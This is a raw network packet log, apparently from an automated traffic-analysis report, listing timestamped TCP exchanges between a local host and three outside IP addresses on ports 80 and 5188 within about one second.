                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976764917 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976775885 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976788044 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976809025 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976819992 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976830006 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976843119 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976850986 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976897955 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977500916 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977551937 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977615118 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977628946 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977641106 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977653027 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977664948 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977664948 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977679014 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977689981 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977703094 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977708101 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977708101 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977714062 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977730989 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.977766991 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978133917 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978156090 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978166103 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978178024 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978188038 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978228092 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978234053 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978269100 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978388071 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978399992 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978411913 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978424072 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978430986 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978437901 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978445053 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978451967 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978463888 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978465080 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978477001 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978481054 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978487968 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978501081 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978507042 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978513956 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978526115 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978542089 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978552103 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.978590965 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979465961 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979477882 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979490042 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979501963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979511023 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979512930 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979522943 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979526043 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979547024 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979549885 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979556084 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979561090 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979566097 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979572058 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979572058 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979578018 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979583979 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979589939 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979595900 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979608059 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.979635000 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980663061 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980675936 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980690002 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980705023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980715990 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980729103 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980735064 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980736017 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980741024 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980751991 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980753899 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980773926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980807066 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980988026 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.980999947 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981036901 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981064081 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981076002 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981101990 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981123924 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981127024 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981136084 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981156111 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981167078 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981172085 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981204987 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981781006 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981795073 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981822014 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981829882 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981838942 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981848001 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981859922 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981872082 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981873989 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981884003 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981897116 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981903076 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981903076 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981909990 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981928110 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981942892 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.981995106 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982007027 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982017994 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982033014 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982033968 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982043982 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982053041 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982057095 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982074976 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982080936 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982099056 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982120991 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982825994 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982836962 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982851028 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982861996 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982871056 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982873917 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982887030 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982896090 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982897997 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982903957 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982911110 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982922077 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982933998 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982939005 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982959986 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982973099 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982984066 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.982985020 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983016014 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983330011 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983374119 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983386040 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983419895 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983433008 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983633041 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983644962 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983655930 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983675957 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983684063 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983688116 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983700991 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983711958 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983712912 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983725071 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983728886 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983736038 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983748913 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983761072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983761072 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983774900 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983777046 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983786106 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983793974 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983799934 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983810902 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983823061 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983825922 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983855963 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.983865976 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984380960 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984441996 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984452963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984463930 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984483004 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984483957 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984496117 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984500885 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984519958 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984530926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984533072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984555960 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984580994 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984637022 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984648943 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984659910 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984673977 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984685898 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984688044 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984698057 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984709978 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984713078 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984735966 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.984745979 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985483885 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985490084 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985502005 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985521078 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985531092 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985532999 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985549927 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985555887 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985563993 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985579014 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985584974 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985594034 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985596895 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985605955 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985610008 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985620022 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985631943 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985656023 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985938072 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985949993 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985969067 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985985994 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985995054 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.985999107 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986010075 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986022949 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986042976 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986042976 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986082077 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986098051 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986109972 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986120939 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986128092 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986133099 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986140013 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986145020 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986151934 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986157894 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986258030 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986946106 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986963987 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986973047 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986977100 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.986989021 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987010002 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987046957 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987145901 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987158060 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987169981 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987180948 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987193108 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987205029 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987207890 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987217903 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987219095 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987231970 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987238884 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987243891 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987257004 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987267971 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987277031 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.987298012 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.988157034 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.988168955 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.988179922 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.988193035 CET51884979292.255.85.66192.168.2.11
